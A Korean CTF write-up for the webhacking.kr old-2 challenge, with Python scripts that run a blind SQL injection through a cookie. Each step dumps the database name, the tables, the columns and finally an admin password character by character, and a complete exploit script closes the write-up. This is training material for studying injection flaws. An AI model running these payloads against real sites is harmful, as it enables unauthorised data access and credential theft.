
OLD-2

페이지에는 현재 시간 값이 출력된다. 이 값은 `time` 쿠키를 SQL 쿼리에 넣어 만든 것이어서, 쿠키에 서브쿼리를 넣으면 그 실행 결과(숫자)가 출력되는 시각의 초 단위에 그대로 나타난다. 따라서 길이 같은 숫자는 바로 읽을 수 있고, 참/거짓 비교식은 1/0이 되어 09:00:01 / 09:00:00 으로 구분된다.
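"""Blind SQL injection helper for webhacking.kr old-2.

The page reflects the value of the ``time`` cookie through a SQL query and
renders the result in the seconds field of a timestamp, so a numeric
sub-select such as ``(select length(...))`` leaks its value directly and a
boolean comparison leaks 0/1.  This first step measures the length of the
current database name.
"""
import os

import requests

# Clear the console; "cls" only exists on Windows, fall back to "clear".
os.system("cls" if os.name == "nt" else "clear")
print("------------AUTO EXPLOIT------------")

URL = "https://webhacking.kr/challenge/web-02/"
# Session cookie of the logged-in account.  It is a bearer credential for
# that account: never commit a live value.
PHPSESSID = "<--REDACTED-->"
# Seconds before a stalled request is abandoned, so one hung connection
# cannot block the whole run.
TIMEOUT = 10
# Marker the page emits when the request bounces back to the index
# (presumably a rejected payload or an invalid session).
REDIRECT_MARKER = "<script>location.href='./';</script>"

print("LOOKING FOR LENGTH")
# Sub-select evaluating to an integer: the length of the database name.
pay = "(select length(group_concat(database())))"
cookie = {
    "PHPSESSID": PHPSESSID,
    "time": pay,
}
res = requests.get(url=URL, cookies=cookie, timeout=TIMEOUT)
if REDIRECT_MARKER in res.text:
    print("REJECTED: page redirected to ./ (check PHPSESSID / payload)")
else:
    # The number shows up as the seconds value of the rendered timestamp.
    print(res.text)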
초 단위에 6이 찍혔다. DB 이름이 6글자라는 뜻이므로, 아래에서는 1~6번 위치를 돌며 한 글자씩 알아낸다.
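# Step 2: recover the database name character by character.  Each probe is a
# comparison that evaluates to 1 or 0, which the page renders as 09:00:01 or
# 09:00:00 in the timestamp (the true/false oracle used from here on).
flag = ""
length = 6  # from the length probe above
for i in range(1, length + 1):
    print("FINDING PW of : " + str(i))
    # Full printable ASCII.  The original 48..89 stopped at 'Y' and never
    # tried lowercase letters or symbols; the later steps already use 32..127.
    for k in range(32, 128):
        print("SEARCHING : " + chr(k), end="\r")
        # Compare the i-th character with a hex literal so no quote character
        # has to be injected.  NOTE(review): whether this compare is
        # case-sensitive depends on which collation wins between the value and
        # the hex literal, so the recovered case may differ from the stored one.
        pay = "(select substr(group_concat(database())," + str(i) + ",1))=" + hex(k)
        cookie = {
            "PHPSESSID": "<--REDACTED-->",
            "time": pay,
        }
        # A timeout keeps one stalled request from hanging the whole run.
        res = requests.get(url=URL, cookies=cookie, timeout=10)
        if "2070-01-01 09:00:00" in res.text:
            continue  # oracle says false
        if "2070-01-01 09:00:01" in res.text:
            flag += chr(k)  # oracle says true
            print()
            print(flag)
            break
        # Neither marker: the reply is not a usable oracle answer (filter hit,
        # expired session, ...).  Report it instead of silently counting it
        # as false and walking on.
        print()
        print("UNEXPECTED RESPONSE at position " + str(i) + " for " + repr(chr(k)))
    else:
        # Ran out of candidates for this position.
        print("PW NOT FOUND")
        raise SystemExit(1)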
DB 이름을 알아냈다: chall2
이제 information_schema.tables에서 이 스키마의 테이블 이름을 알아보자.
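# Step 3: length of the comma-joined list of table names in the chall2 schema.
# The number is read off the seconds field of the printed page.
print("LOOKING FOR LENGTH")
# One pair of parentheses: the original had an extra leading "(" that left
# the expression unbalanced.  group_concat joins names with "," by default,
# so the length includes one separator per additional table.
pay = "(SELECT length(group_concat(table_name)) FROM information_schema.tables WHERE table_schema='chall2')"
cookie = {
    "PHPSESSID": "<--REDACTED-->",
    "time": pay,
}
# A timeout keeps one stalled request from hanging the run.
res = requests.get(url=URL, cookies=cookie, timeout=10)
print(res.text)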
테이블 이름의 길이는 17이다. 다만 group_concat은 여러 이름을 쉼표로 이어 붙이므로 17에는 구분자도 포함되어 있고, 이름이 2개 들어 있으니 한 글자씩 꺼내 보며 확인이 필요하다.
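# Step 4: pull the comma-joined table names (17 chars) one character at a
# time with the same 0/1 oracle used for the database name.
flag = ""
length = 17  # from the length probe above
for i in range(1, length + 1):
    print("FINDING PW of : " + str(i))
    # 32..127 also covers the "," separator between the two names; the
    # earlier 48..127 could only ever report that position as "?".
    for k in range(32, 128):
        print("SEARCHING : " + chr(k), end="\r")
        # NOTE(review): case-sensitivity of the compare depends on which
        # collation wins between the value and the hex literal; the recovered
        # case may differ from the stored one.
        pay = "(SELECT substr(group_concat(table_name)," + str(i) + ",1) FROM information_schema.tables WHERE table_schema='chall2')=" + hex(k)
        cookie = {
            "PHPSESSID": "<--REDACTED-->",
            "time": pay,
        }
        res = requests.get(url=URL, cookies=cookie, timeout=10)
        if "2070-01-01 09:00:00" in res.text:
            continue  # oracle says false
        if "2070-01-01 09:00:01" in res.text:
            flag += chr(k)  # oracle says true
            print()
            print(flag)
            break
        # Neither marker: not a usable oracle answer; say so rather than
        # silently treating it as false.
        print()
        print("UNEXPECTED RESPONSE at position " + str(i) + " for " + repr(chr(k)))
    else:
        # No candidate matched: keep a placeholder so later positions stay aligned.
        flag += "?"
        print()
        print(flag)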
테이블이 두 개 나왔는데, 이름으로 보아 비밀번호는 ADMIN_AREA_PW 테이블에 들어 있을 것이다.
먼저 이 테이블 안에 레코드가 몇 개 있는지 count(*)로 확인한다.
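# Step 5: number of rows in admin_area_pw, read off the seconds field of the
# printed page.
print("LOOKING FOR LENGTH")
pay = "(SELECT count(*) FROM admin_area_pw)"
cookie = {
    "PHPSESSID": "<--REDACTED-->",
    "time": pay,
}
# A timeout keeps one stalled request from hanging the run.
res = requests.get(url=URL, cookies=cookie, timeout=10)
print(res.text)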
레코드는 1개다. 이제 information_schema.columns에서 이 테이블의 컬럼 이름을 알아보자.
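# Step 6: column names of admin_area_pw (group_concat result is 2 chars long),
# recovered through the same 0/1 oracle.
flag = ""
length = 2  # from the length probe
for i in range(1, length + 1):
    print("FINDING PW of : " + str(i))
    for k in range(32, 128):  # printable ASCII
        print("SEARCHING : " + chr(k), end="\r")
        # Filter on table_schema as well: information_schema.columns lists
        # every schema the account can see, so a same-named table elsewhere
        # would otherwise leak into the concatenation.
        pay = "(SELECT substr(group_concat(column_name)," + str(i) + ",1) FROM information_schema.columns WHERE table_schema='chall2' AND table_name='admin_area_pw')=" + hex(k)
        cookie = {
            "PHPSESSID": "<--REDACTED-->",
            "time": pay,
        }
        res = requests.get(url=URL, cookies=cookie, timeout=10)
        if "2070-01-01 09:00:00" in res.text:
            continue  # oracle says false
        if "2070-01-01 09:00:01" in res.text:
            flag += chr(k)  # oracle says true
            print()
            print(flag)
            break
        # Neither marker: not a usable oracle answer.
        print()
        print("UNEXPECTED RESPONSE at position " + str(i) + " for " + repr(chr(k)))
    else:
        # No candidate matched: keep a placeholder so positions stay aligned.
        flag += "?"
        print()
        print(flag)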
거의 다 왔다.
컬럼은 pw 하나이므로, 먼저 pw 값의 길이를 출력한다.
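# Step 7: length of the pw value, read off the seconds field of the printed
# page.  group_concat keeps the probe a single scalar even if the table grows.
print("LOOKING FOR LENGTH")
pay = "(SELECT length(group_concat(pw)) FROM admin_area_pw)"
cookie = {
    "PHPSESSID": "<--REDACTED-->",
    "time": pay,
}
# A timeout keeps one stalled request from hanging the run.
res = requests.get(url=URL, cookies=cookie, timeout=10)
print(res.text)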
이제 길이 17의 pw 값을 한 글자씩 찾는다.
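# Step 8: recover the 17-character pw value through the 0/1 oracle.  The
# result is a live credential for the challenge account: do not paste it
# into the write-up or commit it.
flag = ""
length = 17  # from the length probe
for i in range(1, length + 1):
    print("FINDING PW of : " + str(i))
    for k in range(32, 128):  # printable ASCII
        print("SEARCHING : " + chr(k), end="\r")
        # NOTE(review): case-sensitivity of the compare depends on which
        # collation wins between the column and the hex literal; the recovered
        # case may differ from the stored one.
        pay = "(SELECT substr(group_concat(pw)," + str(i) + ",1) FROM admin_area_pw)=" + hex(k)
        cookie = {
            "PHPSESSID": "<--REDACTED-->",
            "time": pay,
        }
        res = requests.get(url=URL, cookies=cookie, timeout=10)
        if "2070-01-01 09:00:00" in res.text:
            continue  # oracle says false
        if "2070-01-01 09:00:01" in res.text:
            flag += chr(k)  # oracle says true
            print()
            print(flag)
            break
        # Neither marker: not a usable oracle answer; report it.
        print()
        print("UNEXPECTED RESPONSE at position " + str(i) + " for " + repr(chr(k)))
    else:
        # No candidate matched: keep a placeholder so positions stay aligned.
        flag += "?"
        print()
        print(flag)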

전체 코드 (위 단계들을 하나로 합친 것)

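"""Complete blind-SQLi script for webhacking.kr old-2.

The ``time`` cookie is reflected into a SQL query and the numeric result is
rendered in the seconds field of a timestamp.  A comparison therefore leaks
one bit per request (09:00:01 = true, 09:00:00 = false) and a length probe
leaks its value directly.  The individual targets from the walkthrough are
kept as named entries in TARGETS instead of commented-out code.
"""
import os

import requests

# Clear the console; "cls" only exists on Windows, fall back to "clear".
os.system("cls" if os.name == "nt" else "clear")
print("------------AUTO EXPLOIT------------")

URL = "https://webhacking.kr/challenge/web-02/"
# Session cookie of the logged-in account.  It is a bearer credential:
# never commit a live value.
PHPSESSID = "<------redacted--------->"
# Seconds before a stalled request is abandoned.
TIMEOUT = 10
# Oracle markers: the page renders the comparison result 0 / 1 as these.
FALSE_MARK = "2070-01-01 09:00:00"
TRUE_MARK = "2070-01-01 09:00:01"

# target -> (length expression, per-character template).  The template is
# filled with {i} = 1-based position and {k} = hex literal of the candidate
# (a hex literal avoids injecting a quote character).  group_concat keeps
# every probe a single scalar even when the source has several rows.
TARGETS = {
    "db": (
        "(select length(group_concat(database())))",
        "(select substr(group_concat(database()),{i},1))={k}",
    ),
    "table": (
        "(SELECT length(group_concat(table_name)) FROM information_schema.tables WHERE table_schema='chall2')",
        "(SELECT substr(group_concat(table_name),{i},1) FROM information_schema.tables WHERE table_schema='chall2')={k}",
    ),
    "column": (
        "(SELECT length(group_concat(column_name)) FROM information_schema.columns WHERE table_name='admin_area_pw')",
        "(SELECT substr(group_concat(column_name),{i},1) FROM information_schema.columns WHERE table_name='admin_area_pw')={k}",
    ),
    "pw": (
        "(SELECT length(group_concat(pw)) FROM admin_area_pw)",
        "(SELECT substr(group_concat(pw),{i},1) FROM admin_area_pw)={k}",
    ),
}


def probe(payload):
    """Send one request with *payload* in the ``time`` cookie; return the body."""
    cookie = {
        "PHPSESSID": PHPSESSID,
        "time": payload,
    }
    return requests.get(url=URL, cookies=cookie, timeout=TIMEOUT).text


def find_length(target):
    """Print the page for the length probe of *target*; read the seconds field."""
    print("LOOKING FOR LENGTH")
    print(probe(TARGETS[target][0]))


def extract(target, length):
    """Recover *length* characters of *target* through the 0/1 oracle.

    Returns the recovered string.  Positions where no candidate matched are
    filled with "?" so the remaining positions stay aligned.
    """
    template = TARGETS[target][1]
    flag = ""
    for i in range(1, length + 1):
        print("FINDING PW of : " + str(i))
        for k in range(32, 128):  # printable ASCII
            print("SEARCHING : " + chr(k), end="\r")
            # NOTE(review): case-sensitivity of the compare depends on which
            # collation wins between the value and the hex literal; the
            # recovered case may differ from the stored one.
            body = probe(template.format(i=i, k=hex(k)))
            if FALSE_MARK in body:
                continue
            if TRUE_MARK in body:
                flag += chr(k)
                print()
                print(flag)
                break
            # Neither marker: not a usable oracle answer (filter hit, expired
            # session, ...).  Report it rather than silently count it as false.
            print()
            print("UNEXPECTED RESPONSE at position " + str(i) + " for " + repr(chr(k)))
        else:
            flag += "?"
            print()
            print(flag)
    return flag


if __name__ == "__main__":
    # Same run as the original listing: the 17-character admin password.
    extract("pw", 17)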